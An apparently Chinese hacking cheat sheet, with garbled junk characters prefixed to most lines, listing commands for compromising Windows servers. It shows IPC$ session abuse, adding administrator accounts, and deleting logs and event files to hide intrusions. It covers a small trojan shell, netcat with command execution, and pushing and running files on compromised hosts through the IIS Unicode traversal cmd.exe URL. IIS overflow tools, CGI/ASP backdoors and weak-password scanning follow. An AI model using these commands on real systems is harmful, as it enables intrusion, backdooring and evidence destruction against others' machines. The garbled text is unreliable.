网管和黑客都必须知道的命令
K�w =R�qF� 常用的几条NET命令:
p�Hzl/�b�8 JY�R�^k��= (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
A�\�})��H �d-jZ�5nl( (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
�C'���6c�, ��s[;1?+EI (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
Rxq�4Diq5k �(7C$'T-ZK (查看远程主机时间) net time \\IP地址
�AH�zm9U @ 5Y>fVq{U?; (定时启动某个程序) at \\IP地址 02:18 readme.exe
;��o?o�92d o]B�2^Yq;x (查看共享) net view \\IP地址
tN;^�{O-(V uBw[|,yn2* (查看netbios工作组列表) nbtstat -A IP地址
t9�r
R>Y�9 X�b�@dQRVX (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
R(s[�JH(�& /j�Sb�^1\� (这两条把自己增加到管理员组): net user 用户名 密码 /add
>@EwfM4�[e wlDo(]mj=O net localgroup Administrators 用户名 /add
NNBT.k�3) [W9�9}b�i$ (断开连接) net use \\IP地址\ipc$ /delete
�.�M��s$)1 Meh�p]��5* 扫尾:
�>#y�1(\e� �(ZP e{;L. del C:\winnt\system32\logfiles\*.*
{�<zE}7/2- �65�GC7 >[ del C:\winnt\ssytem32\config\*.evt
:B�F
WX��� �ypNe�TR$4 del C:\winnt\system32\dtclog\*.*
y\:,.cZ+TQ .*�?)L3n+t del C:\winnt\system32\*.log
�0R;�`)V\^ \==M�gy2J8 del C:\winnt\system32\*.txt
MfraTUxIo/ @ev�^e�!�B del C:\winnt\*.txt
�*-'`���Ea N6v*X+4�JH del C:\winnt\*.log
�� �ny�Z?m )>]�SJQ!�k 一、netsvc.exe
��N@�"e^i�
GYonb)�F� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
_k5$.f:Yj< =H"%{Ve�C5 netsvc /list \\IP地址
�~�]B��R(n �sA�
}X)aP netsvc schedule \\IP地址 /query
��iH��Wt;] US��XP��a[ netsvc \\IP地址 schedule /start
�^.M_1$-� {X��W>�3 " 二、OpenTelnet.exe
�4V�zS�qb !9^G�kFR6n 远程启动主机的Telnet服务,并绑定端口到7878,例如:
Si�|8xq$E; SN�V�;�s�, OpenTelnet \\IP地址 用户名 密码 1 7878
&<���hk&B� Q�8�D�K�U� 然后就可以telnet到主机的7878端口,进入DOS方式下:
tOPk��x�(� :$Q�wOz^N* telnet IP地址 7878
mW)"~s�A�� R� �xW�D>: 三、winshell.exe
$'�lJ_��jL %�;�`�3�I$ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
3iiOxg?�j� /PkO��F�(( p Path (查看winshell主程序的路径信息)
*oIK�ddZ�h RHq� r-��% b reBoot (重新启动机器)
Pv�@;)s(�- !" :� arK� d shutDown (关闭机器)
&�J=x[��{R .sU���L5`� s Shell (执行后你就会看到可爱的“C:\>”)
F,X�JGD�*� ,ql�Fk|�A| x eXit (退出本次登录会话,此命令并不终止winshell的运行)
hpt�i�cW�| �<�J�J��i� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
P�q�(
�)2B X .S8vlb4z 四、3389登陆器,GUI方式登录远程主机的
CY��9`HQ1 LZ�u�_-��I 五、elsave.exe
ZP%Bu2�xd y�D�w^xGws 事件日志清除工具
#�/p�Z#n�y 0M>%1���*� elsave -s \\IP地址 -l "application" -C
Mq�,_�DQ�� ?�rV ��c} elsave -s \\IP地址 -l "system" -C
:Ee5:S ��� Bb/a���eLv elsave -s \\IP地址 -l "security" -C
gC�lDV�O� FkT���% -I 执行后成功清除应用程序日志,系统日志,安全日志
0b}lwo,�|\ ?)5M3�lV3k 六、hbulot.exe
�k)���USLA 8� _[f#s`) 开启win2kserver和winxp的3389服务
B��F��6H_g ;
�bD�FrG hbulot [/r]
�
?hpk)Qu� N��,_ej@L8 使用/r表示安装完成后自动重起目标使设置生效。
+NE��P�*mk J�XnP�KA�N 七、nc.exe(netcat.exe)
4B�}w;�d@R )�+9D$m=P; 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�G8?<(.pi@
ss��3fq} 想要连接到某处: nc [-options] hostname port[s] [ports] ...
J0|}u1�?�l %jM|*�^\%� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
`ion�M�TZY et�]*5Y�6 参数:
n�*6'�,BY� @kwD$%*0� -e prog 程序重定向,一旦连接,就执行 [危险!!]
jIc;jj�AF� �a^5`fA/L, -g gateway source-routing hop point[s], up to 8
=�-pss 47� l7J_�s�?!j -G num source-routing pointer: 4, 8, 12, ...
J0��p,P.G� U w`�LWG3T -h 帮助信息
�r�b�\Ohv\ NV-9C$<n2! -i secs 延时的间隔
8h2�0*@wSN D+�o.9I/{� -l 监听模式,用于入站连接
83l)o�$S c[y=K�)<Z� -n 指定数字的IP地址,不能用hostname
B�K �d�(�� �4+�k:j=x� -o file 记录16进制的传输
H�Ia$0g0�J JN �KZ'��9 -p port 本地端口号
fp![Pbm�s. Y�g�]f2�ke -r 任意指定本地及远程端口
<7]
�z�'
�usTCn3��u -s addr 本地源地址
�5PL,���~Y P/��PS(`�� -u UDP模式
�tl^�[MLQa "\=_�- �`� -v 详细输出——用两个-v可得到更详细的内容
Y)��
t}%62 -<O:isB��� -w secs timeout的时间
g�wYd���4 �^c�7L�!�F -z 将输入输出关掉——用于扫描时
a�nwn!Eqk" 八、TFTPD32.EXE
Hf-F�-~��E _IN��UJ��c 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
vZDQ@\HrC� j{�Fo �6## http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
<C{5(=�X�{ 6�8!f�cK�� 然后可以直接令文件运行:
&sRJ��'o�c �sq^"b�Lw� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
(o���s�7Q? ?�h�u ��9c 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�g��Pi_+-@ g0U
���?s 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�.e��AC!�R ����e4b~s� 一、一 Xscan命令行运行参数说明:
,'67�3�PR� ��NE4fQi?3 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�]O\W<'+V� �b�c�s!4�� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�Ttj�5%�~� @6!JW(,]\� xscan -file <主机列表文件名> <检测项目> [其他选项]
8d�h�Y�"&� hF���1/=;> 其中<检测项目> 含义如下:
_YS+{0
Vq% !T~d5^l��! -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
|�<*(`\�'w yB�j)#�m5! -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
f.$o|��R=v ��Jq#Cn+zW -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
[�s�2V�-'2 �$(�R)
�=4 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�k#��(c�Z �M::i���U_ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
"/fs���%F b�Z��XNo�� [其他选项] 含义如下:
Mg$9'a"[\� �F����ud�D -v: 显示详细扫描进度
�%}�!}2s.A �? ��^CGJ1 -p: 跳过Ping不通的主机
}j1Z�k4}[x 2&fwr>�!$� -o: 跳过没有检测到开放端口的主机
i ��8X��z� c1J)yv�1�y -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
